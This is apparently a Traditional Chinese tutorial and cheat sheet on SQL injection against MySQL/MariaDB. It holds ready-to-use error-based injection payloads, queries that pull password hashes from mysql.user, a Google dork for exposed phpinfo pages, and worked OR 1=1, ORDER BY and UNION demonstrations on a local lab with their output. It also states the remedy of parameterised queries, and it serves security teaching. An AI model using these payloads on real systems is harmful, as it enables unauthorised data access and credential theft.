SQL注入
SQL常用函式
- SQL常用函式
  - MID(字串, 起始位置, 長度)：擷取字串（注意第三個參數是「長度」而非結束位置）
  - CHAR(ASCII碼)：返回 ASCII 碼對應的字元
  - ASCII(字元)：返回字元對應的 ASCII 碼
  - IF(邏輯表示式, 返回值1, 返回值2)：用於判斷，條件為真返回「返回值1」，否則返回「返回值2」
  - SUBSTR(字串, 起始位置, 長度)：擷取字串（同 SUBSTRING，第三個參數同樣是長度）
  - LENGTH(字串)：返回字串長度（以位元組計；多位元組字元的字元數請用 CHAR_LENGTH）
  - COUNT(列名)：返回該列非 NULL 的記錄數
  - SLEEP(s)：暫停 s 秒，s 為數字可自訂，用於時間盲注
  - 註釋符：#、/**/、--（MySQL 中 `--` 之後必須緊接空白才會被視為註釋，URL 中常寫成 `--+` 或 `-- -`）
  - CONCAT(字串1, 字串2, ...)：拼接字串
  - LOAD_FILE(檔名稱)：讀取資料庫伺服器上的檔案，需要 FILE 權限且受 secure_file_priv 設定限制
  - INTO OUTFILE '檔名稱'：將查詢結果寫入資料庫伺服器上的檔案，同樣需要 FILE 權限且受 secure_file_priv 限制
常用十大報錯函式（報錯注入：讓資料庫把查詢結果帶進錯誤訊息回顯。注意 extractvalue()/updatexml() 的回顯每次最多 32 個字元；geometry 系列函式與 exp() 的報錯方式只在較舊版本的 MySQL 有效，實際可用性需依目標版本驗證）
-
floor()
select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
-
extractvalue()
select * from test where id=1 and (extractvalue(1, concat(0x7e, (select user()),0x7e)));
-
updatexml()
select * from test where id=1 and (updatexml(1, concat(0x7e, (select user()), 0x7e), 1));
-
geometrycollection()
select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));
-
multipoint()
select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));
-
polygon()
select * from test where id=1 and polygon((select * from (select * from (select user()) a) b));
-
multipolygon()
select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));
-
linestring()
select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));
-
multilinestring()
select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));
-
exp()
select * from test where id=1 and exp(~(select * from (select user()) a));
MySQL常用函式
-
查詢版本
select version();
-
查詢密碼雜湊（取得的是雜湊值而非明文；MariaDB 與 MySQL 5.6 以前為 password 欄位，MySQL 5.7 以後改為 authentication_string 欄位）
select password from mysql.user;
-- MySQL 5.7+：select authentication_string from mysql.user;
-
查詢所有資料
select * from mysql.user;
MySQL資料庫配置檔案
-
MySQL使用者許可權
information_schema.USER_PRIVILEGES
select * from information_schema.USER_PRIVILEGES;
-
MySQL資料庫及表的情況
information_schema.TABLES
select * from information_schema.TABLES;
-
MySQL資料庫及表的情況(包含欄位)
information_schema.COLUMNS
select * from information_schema.COLUMNS;
SQL注入測試
-
在搜尋引擎中輸入以下 Google dork 以尋找可能暴露 phpinfo 頁面的站點（僅可對已取得授權的目標進行測試）
inurl:/phpinfo.php
-
SQL注入是如何產生的
- 這些攻擊發生在不可信的資料被當作命令或查詢語句的一部分，發送給直譯器的時候
- 攻擊者傳送的惡意資料可以欺騙直譯器
- 使其執行計劃外的命令，或在未被恰當授權的情況下存取資料
- 根本防護方式：使用參數化查詢（預備語句）綁定使用者輸入，而不是用字串拼接組成 SQL；並以最小權限的資料庫帳號執行應用程式
or
語句 SQL注入
- 功能
- 獲取整張表的資料（`or 1=1` 使 WHERE 條件恆為真，繞過原本的篩選）
# 正常查詢操作
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name | sex | chinese | math |
+-------+------+---------+------+
| Sunny | boy | 93 | 96 |
+-------+------+---------+------+
# `1 row in set (0.000 sec)`
# SQL注入操作
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name | sex | chinese | math |
+-------+------+---------+------+
| Sunny | boy | 93 | 96 |
| Jerry | boy | 97 | 91 |
| Marry | girl | 95 | 94 |
| Tommy | boy | 98 | 94 |
+-------+------+---------+------+
# `4 rows in set (0.001 sec)`
MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title | content | createtime |
+----+----------+--------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 2 | 基本知識 | 第2章 HTML中的Javascript | 1607050590 |
| 3 | 基本知識 | 第3章 語言基礎 | 1607052573 |
| 4 | 基本知識 | 第4章 變數、作用域和記憶體 | 1607070553 |
+----+----------+--------------------------+------------+
# `4 rows in set (0.001 sec)`
order by
語句 SQL注入
- 功能
- 推斷查詢結果的欄位數量（`order by N` 的 N 超過欄位數時會報錯，逐步嘗試即可得知欄位數，為後續 union 注入做準備）
MariaDB [sel]> select * from news where id=2 order by 5;
# `ERROR 1054 (42S22): Unknown column '5' in 'order clause'`
MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title | content | createtime |
+----+----------+--------------------------+------------+
| 2 | 基本知識 | 第2章 HTML中的Javascript | 1607050590 |
+----+----------+--------------------------+------------+
# `1 row in set (0.000 sec)`
union
語句 SQL注入
- 功能
- 確認查詢結果的欄位數量，並透過 UNION 把其他表的資料帶入回顯（UNION 兩側的欄位數必須相同，否則報錯）
# 正常情況
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
+----+----------+------------------------+------------+
# `1 row in set (0.000 sec)`
MariaDB [sel]> select * from news where id=1 union select 0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 0 | 0 | 0 | 0 |
+----+----------+------------------------+------------+
# `2 rows in set (0.006 sec)`
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
- 功能
- 獲取mysql資料
MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from mysql.user;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 1 | 2 | 127.0.0.1 | 4 |
| 1 | 2 | ::1 | 4 |
| 1 | 2 | localhost | 4 |
+----+----------+------------------------+------------+
# `4 rows in set (0.011 sec)`
- 功能
- 獲取資料庫中的所有的資料庫名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from information_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime |
+----+-------+---------+--------------------+
| 1 | 2 | 3 | information_schema |
| 1 | 2 | 3 | mysql |
| 1 | 2 | 3 | performance_schema |
| 1 | 2 | 3 | phpmyadmin |
| 1 | 2 | 3 | sel |
| 1 | 2 | 3 | stu |
+----+-------+---------+--------------------+
# `6 rows in set (0.018 sec)`
- 功能
- 獲取資料庫中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES;
- 功能
- 獲取某個資料庫中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
| 1 | 2 | 3 | bank |
| 1 | 2 | 3 | best |
| 1 | 2 | 3 | bestmath |
| 1 | 2 | 3 | grades |
| 1 | 2 | 3 | news |
| 1 | 2 | 3 | resume |
| 1 | 2 | 3 | stu1 |
| 1 | 2 | 3 | stu2 |
+----+-------+---------+------------+
# `8 rows in set (0.012 sec)`
- 功能
- 獲取某張表中的所有的欄位名（若多個資料庫中有同名的表，應再加上 `table_schema='sel'` 條件，否則會混入其他資料庫的欄位）
MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from information_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
| 1 | 2 | 3 | id |
| 1 | 2 | 3 | title |
| 1 | 2 | 3 | content |
| 1 | 2 | 3 | createtime |
+----+-------+---------+------------+
# `4 rows in set (0.016 sec)`
- 功能
- 獲取欄位內容
MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 1 | 2 | 3 | 基本知識 |
+----+----------+------------------------+------------+
# `2 rows in set (0.011 sec)`